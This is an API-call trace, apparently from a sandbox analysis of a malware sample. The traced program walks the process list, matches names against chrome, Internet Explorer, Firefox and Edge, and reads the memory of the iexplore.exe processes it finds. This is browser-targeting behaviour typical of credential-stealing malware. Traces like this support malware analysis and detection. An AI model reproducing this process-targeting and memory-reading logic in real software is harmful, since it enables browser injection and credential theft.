	[0197.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.160] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0197.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.161] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.161] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0197.162] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1374
	[0197.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.162] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0197.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.162] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.163] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0197.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.163] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.163] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0197.164] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1378
	[0197.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.164] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0197.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.164] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.165] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0197.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.165] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.165] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0197.166] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x137c
	[0197.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.166] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0197.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.166] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.167] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0197.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.167] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.167] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0197.168] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1380
	[0197.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.168] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0197.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.169] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.169] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0197.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.170] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.170] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0197.171] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1384
	[0197.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.171] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0197.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.171] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.171] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0197.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.172] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.172] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0197.173] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1388
	[0197.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.173] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0197.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.173] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.174] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0197.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.175] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.175] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0197.176] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x138c
	[0197.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.176] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0197.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.176] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.177] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0197.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.177] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.177] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0197.178] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1390
	[0197.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.178] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0197.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.178] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.179] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0197.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.179] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.179] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0197.180] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1394
	[0197.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.180] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0197.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.180] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.180] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0197.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.181] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.181] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0197.181] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1398
	[0197.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.182] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0197.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.182] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.182] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0197.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.183] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.183] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0197.184] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x139c
	[0197.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.184] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0197.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.185] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.185] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0197.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.186] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.186] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0197.187] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x13a0
	[0197.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.187] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0197.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.187] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.188] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0197.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.188] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.189] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0197.189] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x13a4
	[0197.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.189] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0197.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.190] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.191] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0197.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.191] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.192] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0197.192] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x13a8
	[0197.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.193] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0197.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.193] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.194] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0197.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.194] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.194] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0197.195] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x13ac
	[0197.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.195] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0197.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.195] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0197.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.196] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0197.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.196] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.196] NtQueryInformationProcess (in: ProcessHandle=0x13ac, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0197.196] ReadProcessMemory (in: hProcess=0x13ac, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0197.196] ReadProcessMemory (in: hProcess=0x13ac, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0197.196] ReadProcessMemory (in: hProcess=0x13ac, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0197.196] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0197.197] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0197.197] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x13b0
	[0197.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.197] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0197.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.198] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0197.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.198] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0197.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.198] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.198] NtQueryInformationProcess (in: ProcessHandle=0x13b0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0197.198] ReadProcessMemory (in: hProcess=0x13b0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0197.199] ReadProcessMemory (in: hProcess=0x13b0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0197.199] ReadProcessMemory (in: hProcess=0x13b0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0197.199] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0197.199] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0197.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x13b4
	[0197.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.200] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0197.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.235] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.235] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0197.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.236] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.236] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0197.237] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x13b8
	[0197.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.237] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0197.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.238] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.238] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0197.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.238] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.238] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.239] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x13bc
	[0197.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.239] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.240] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.240] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.240] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.240] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.241] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0197.242] CloseHandle (hObject=0x188) returned 1
	[0197.242] Sleep (dwMilliseconds=0x64) 
	[0197.403] GetCurrentProcessId () returned 0x110
	[0197.403] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0197.406] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0197.406] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0197.407] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0197.408] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x13c0
	[0197.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.408] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0197.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.408] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.408] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0197.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.409] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.409] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0197.409] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x13c4
	[0197.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.410] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0197.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.410] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.410] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0197.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.410] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
